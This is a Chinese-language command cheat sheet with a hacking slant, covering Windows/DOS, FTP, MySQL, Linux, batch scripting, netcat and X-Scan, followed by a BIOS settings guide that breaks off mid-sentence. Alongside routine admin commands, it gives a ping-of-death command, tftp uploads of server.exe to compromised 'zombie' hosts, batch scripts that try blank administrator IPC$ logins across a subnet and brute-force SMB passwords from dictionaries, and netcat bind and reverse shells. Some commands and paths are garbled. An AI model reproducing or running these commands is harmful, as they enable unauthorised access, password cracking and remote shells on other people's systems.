netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
\\ip\***$\svv.exe c:\ 或:\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
x 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

#3 三:

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四:

IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cp 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cp 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

#5 五:

MYsql 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysql*** -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqlmp --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。

#6 六:

Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)

附:批处理命令与变量

1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。http://www.jz5u.com

#7 七:

2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”

(二)系统外部命令(均需下载相关工具):

1、瑞士军刀:nc.exe

参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

#8 八:

2、扫锚工具:xscan.exe

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机

Ⅵ 如何在内网建立FTP服务器

1、通过电脑直接找到ftpserver.exe并双击运行。

Ⅶ BIOS设置详解

BIOS 设置详解
AWARD BIOS
AWARD BIOS是目前应用最为广泛的一种BIOS。本文将详细介绍一下AWARD BIOS中的有关设置选项的含义和设置方法,在AWARD BIOS的主菜单中主要有以下几个菜单项:
Standard CMOS Setup(标准CMOS设定):
这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理方法等。
(1)在IDE设备设置中,用户可以在Type(类型)和Mode(模式)项设为Auto,使每次启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项,手动设定硬盘的参数。必须输入柱面数(Cyls),磁头数(Heads),写预补偿(Precomp),磁头着陆区(Landz),每柱面扇区数(Sectorxs),工作模式(Mode)等几种参数。硬盘大小在上述参数设定后自动产生。
(2)显示类型可选EGA/VGA(EGA、VGA、SEGA、SVGA、PGA显示适配卡选用)、CGA40(CGA显示卡,40列方式)、CGA80(CGA显示卡,80列方式)、MONO(单色显示方式,包括高分辨率单显卡)等四种,以现在我们使用的计算机来看,绝大多数都属于EGA/VGA显示类型。
(3)暂停的出错状态选项有:All Errors(BIOS检测到任何错误,系统启动均暂停并且给出出错提示)、No Errors(BIOS检测到任何错误都不使系统启动暂停)、All But Keyboard(BIOS检测到除了磁盘之外的错误后使系统启动暂停,磁盘错误暂停)、All But Disk/Key(BIOS检测到除了键盘或磁盘之外的错误后使系统启动暂停。
BIOS Features Setup(BIOS功能设定)
该项用来设置系统配置选项清单,其中有些选项由主板本身设计确定,有些选项用户可以进行修改设定,以改善系统的性能。常见选项说明如下:
(1)Virus Warning(病毒警告):这项功能在外部数据写入硬盘引导区或分配表的时候,会提出警告。为了避免系统冲突,一般将此功能关闭,置为Disable(关闭)。
(2)CPU Internal Cache(CPU Level 1 catch):缺省为Enable(开启),它允许系统使用CPU内部的第一级Cache。486以上档次的CPU内部一般都带有Cache,除非当该项设为开启时系统工作不正常,此项一般不要轻易改动。该项若置为Disable,将会严重影响系统的性能。
(3)External Cache(CPU Level 1 catch):缺省设为Enable,它用来控制主板上的第二级(L2)Cache。根据主板上是否带有Cache,选择该项的设置。
(4)BIOS Update:开启此功能则允许BIOS升级,如关闭则无法写入BIOS。
(5)Quick Power On Self Test:缺省设置为Enable,该项主要功能为加速系统上电自测过程,它将跳过一些自测试。使引导过程加快。
(6)Hard Disk Boot From(HDD Sequence SCSI/IDE First):选择由主盘、从盘或SCSI硬盘启动。
(7)Boot Sequence:选择机器开电时的启动顺序。有些BIOS将SCSI硬盘也列在其中,此外比较新的主板还提供了LS 120和ZIP等设备的启动支持,一般BIOS,都有以下四种启动顺序:C,A(系统将按硬盘,软驱顺序寻找启动盘);A,C(系统将按软驱,硬盘顺序寻找启动盘);CDROM,C,A(系统按CDROM,硬盘,软驱顺序寻找启动盘);C,CDROM,A(系统按硬盘,CDROM,软驱顺序寻找启动盘)。
(8)Swap Floppy Drive:(交换软盘驱动器)缺省设定为Disable。当它Disable时,BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时,BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器,即在DOS下A盘当作B盘用,B盘当作A盘用。
(9)Boot Up Floppy Seek:当Enable时,机器启动时BIOS将对软驱进行寻道操作。
(10)Floppy Disk Access Contol:当该项选在R/W状态时,软驱可以读和写,其它状态只能读。
(11)Boot Up Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时,系统启动后,小键盘的缺省为数字状态;设为OFF时,系统启动后,小键盘的状态为箭头状态。
(12)Boot Up System Speed:该选项用来确定系统启动时的速度为HIGH还是LOW。
(13)Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时,如果按下键盘上的某个键不放,机器按你重复按下该键对待;当置为Disable时,如果按下键盘上的某个键不放,机器按键入该键一次对待。
(14)Typematic Rate:如果Typematic Rate Setting选项置为Enable,那么可以用此选项设定当你按下键盘上的某个键一秒钟,那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
(15)Typematic Delay:如果Typematic Rate Setting选项置为Enable,那么可以用此选项设定按下某一个键时,延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000,单位为毫秒。
(16)Security Option:选择System时,每次开机启动时都会提示你输入密码,选择Setup时,仅在进入BIOS设置时会提示你输入密码。
(17)PS/2 Mouse Function Control:当该项设为Enable,机器提供对于PS/2类型鼠标的支持,AUTO可以在系统启动是自动侦测PS/2 Mouse,分配IRQ。
(18)Assign PCI IRQ For VGA:选Enable时,机器将自动设定PCI显示卡的IRQ到系统的DRAM中,以提高显示速度和改善系统的性能。
(19)PCI/VGA Palett Snoop:该项用来设置PCI/VGA卡能否与MPEG ISA/VESA VGA卡一起用。当PCI/VGA卡与MPEG ISA/VESA VGA卡一起用或使用其他非标准VGA时,该项应设为Enable。
(20)OS Select For DRAM>64MB:如果使用OS/2操作系统,使用64MB以上的内存。该项选为OS2。
(21)System BIOS Shadow:该选项的缺省设置默认为Enable,当它开启时,系统BIOS将拷贝到系统Dram中,以提高系统的运行速度和改善系统的性能。
(22)Video BIOS Shadow:缺省设定为开启(Enable),当它开启时,显示卡的BIOS将拷贝到系统DRAM中,以提高显示速度和改善系统的性能。
(23)C8000-CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区,一般都设定为禁止(Disable)。如果有某一扩充卡ROM需要映射,则用户应搞清楚该ROM将映射地址和范围,可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的
地址空间将占用系统的640K~1024K之间的某一段内存。
Chipset Features Setup(芯片组功能设定)
该项用来设置系统板上芯片的特性。常见选项如下:
(1)ISA Bus Clock frequency(PCICLK/4)ISA传输速率设定。设定值有:PCICLK/3;PCICLK/4。
(2)Auto Configuration(Enabled)自动状态设定。
当设定为Enabled时BIOS依最佳状况状态设定,此时BIOS会自动设定DRAM Timing,所以会无法修改DRAM的细项时序,强烈建议选用Enabled,因为任意改变DRAM的时序可能造成系统不稳或不开机。
(3)Aggressive Mode(Disabled)高级模式设定。
若想获得较好的效能时,而且系统在非常稳定状态下,可以尝试Enabled此项功能以增加系统效能,不过必须使用速度较快DRAM(60ns以下)。
Power Management Setup(节电功能设定)
该项为电源管理设定,用来控制主板上的“绿色”功能。该功能定时关闭视频显示和硬盘驱动器以实现节能的效果。
实现节电的模式有以下四种:
1.Doze模式,当设定时间一到,CPU时钟变慢,其他设备照常运作;
2.Standby模式,当设定时间一到,硬盘和显示将停止工作,其他设备照常运作;
3.Suspend模式,当设定时间一到,除CPU以外的所有设备都将停止工作;
4.HDD Power Down模式,当设定时间一到,硬盘停止工作,其他设备照常运作。
本菜单项下可供选择的内容如下:
(1)Power Management节电模式的主控项,有四种设定:
Max Saving(最大节电)在一个较短的系统不活动的周期(Doze、Standby、Suspend、HDD Power Down四种模式的缺省值均为1分钟)以后,使系统进入节电模式,这种模式节电最大。
MIN Saving(最小节电)在一段较长的系统不活动的周期在这种情况下,(Doze,Standby,Suspend三种模式的缺省值均为1小时,HDD Power Down模式的缺省值为15分钟)后,使系统进入节电模式。
Disable关闭节电功能,是缺省设置。
User Defined(用户定义)允许用户根据自己的需要设定节电的模式。
(2)Video Off Method(视频关闭)该选项可设为V/H Sync+Blank、Dpms、Blank Screen三种。 V/H Sync+Blank将关闭显示卡水平与垂直同步信号的输出端口,向视频缓冲区写入空白信号。 DPMS(显示电源管理系统)设定允许BIOS在显示卡有节电功能时,对显示卡进行节能信息的初始化。只有显示卡支持绿色功能时,用户才能使用这些设定。如果没有绿色功能,则应将该行设定为Blank Screen(关掉屏幕)。
Blank Screen(关掉屏幕)当管理关掉显示器屏幕时,缺省设定能通过关闭显示器的垂直和水平扫描以节约更多的电能。没有绿色功能的显示器,缺省设定只能关掉屏幕而不能终止CRT的扫描。
(3)PM Timers(电源管理记时器)下面的几项分别表示对电源管理超时设置的控制。Doze,Stand By和Suspend Mode项设置分别为该种模式激活前的机器闲置时间,在MAX Saving模式,它每次在一分钟后激活。在MIN Saving模式,它在一小时后激活。
(4)Power Down和Resume Events(进入节电模式和从节电状态中唤醒的事件)。该项下面所列述的事件可以将硬盘设在最低耗电模式,工作、等待和悬挂系统等非活动模式中若有事件发生,如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时,系统自动从电源节电模式下恢复过来。
PNP/PCI Configuration Setup(即插即用与PCI状态设定)
该菜单项用来设置即插即用设备和PCI设备的有关属性。
(1)PNP OS Installed:如果软件系统支持Plug&Play,如Win95,可以设置为YES。
(2)Resources Controlled By:AWARD BIOS支持“即插即用”功能,可以检测到全部支持“即插即用”的设备,这种功能是为类似Win95操作系统所设计的,可以设置Auto(自动)或Manual(手动)。
(3)Resources Configuration Data:缺省值是Disabled,如果选择Enabled,每次开机时,Extend System Configuration Data(扩展系统设置数据)都会重新设置。
(4)IRQ3/4/5/7/9/10/11/12/14/15:在缺省状态下,除了IRQ3/4,所有的资源,都设计为被PCI设备占用,如果某些ISA卡要占用某资源可以手动设置。
Intergrated Peripherals Setup(外部设备设定)
该菜单项用来设置集成主板上的外部设备的属性。
(1)IDE HDD Block Mode:如果选择Enable,可以允许硬盘用快速块模式(Fast Block Mode)来传输数据。
(2)IDE PIO Mode:这个设置取决于系统硬盘的速度,共有AUTO,0,1,2,3,4五个选项,Mode4硬盘传输速率大于是16.6MB/s,其它模式的小于这个速率。不要选择超过硬盘速率的模式,这样会丢失数据。
(3)IDE UMDA(Ultra DMA)Mode:Intel 430TX芯片提供了Ultra DMA Mode,它可以把传输速率提高到一个新的水准。
Load BIOS Defaults(装入BIOS缺省值)
主机板的CMOS中有一个出厂时设定的值。若CMOS内容被破坏,则要使用该项进行恢复。由于BIOS缺省设定值可能关掉了所有用来提高系统的性能的参数,因此使用它容易找到主机板的安全值和除去主板的错误。该项设定只影响BIOS和Chipset特性的选定项。不会影响标准的CMOS设定。移动光标到屏幕的该项然后按下Y或Enter键,屏幕显示是否要装入BIOS缺省设定值,键入Y即装入,键入N即不装入。选择完后,返回主菜单。
Supervisor Password And User Password Setup(超级用户与普通用户密码设定)
User Passowrd Setting功能为设定密码。如果要设定此密码,首先应输入当前密码,确定密码后按Y,屏幕自动回到主画面。输入User Passowrd可以使用系统,但不能修改CMOS的内容。输入Supervisor Password可以输入、修改CMOS BIOS的值,Supervisor Password是为了防止
